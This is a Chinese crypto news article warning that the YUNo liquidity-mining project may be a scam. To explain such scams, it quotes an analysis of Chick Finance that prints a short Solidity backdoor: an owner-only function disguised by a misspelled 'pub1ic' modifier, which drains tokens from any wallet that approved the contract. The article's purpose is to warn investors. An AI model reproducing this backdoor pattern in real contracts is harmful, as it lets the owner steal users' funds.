原创文章,作者:QKL123,如若转载,请注明出处:http://qkl12315.com/archives/7754
Discord社区用户:YUNo是一个骗局,项目方可以盗取资金
9月1日,Discord社区用户“sadcat”表示,流动性挖矿项目YUNo是一个骗局,他在代码中发现了无限增发的函数,项目方可以盗取资金。他还表示,他将自己的发现发到了YUNo的官方电报群里并被踢出了群。据了解,YUNo协议的代码尚未通过安全审计。
流动性挖矿的项目很多,投资者还是尽量选择那些经过代码审计的项目,否则你将很容易血本无归。
很明显之前也出现过合约代码问题,之前有个名叫chick finance的项目。下文来自比特派钱包。
任何给该合约授权了的用户,开发者都能把你钱包里的代币一扫而空(不仅仅是你存入合约的)。
function startReward(address _from, uint256 amount) external pub1ic{
weth.safeTransferFrom(_from, owner(), amount);
}
开发者对故意拼写错误的 pub1ic 做了如下约束(也就是只有合约 Owner 才能调用,如果没这个调用,那就变成谁都能干这事儿了,开发者想的是自己偷,肯定不想让别人偷)
modifier pub1ic() {
require(isOwner(), “Ownable: caller is not the owner”);
_;
}
上述代码的逻辑很简单,干的就是那些给这个合约授权了的用户,合约 Owner 都能把你的代币转给 Owner,就这么简单。
对此给你们的建议就是在自己能承受的范围内参与流动性挖矿,不过目前的手续费比较贵,所以可能对于小资金玩家来说并不是那么友好。
量力而行。
- 免责声明
- 世链财经作为开放的信息发布平台,所有资讯仅代表作者个人观点,与世链财经无关。如文章、图片、音频或视频出现侵权、违规及其他不当言论,请提供相关材料,发送到:2785592653@qq.com。
- 风险提示:本站所提供的资讯不代表任何投资暗示。投资有风险,入市须谨慎。
- 世链粉丝群:提供最新热点新闻,空投糖果、红包等福利,微信:juu3644。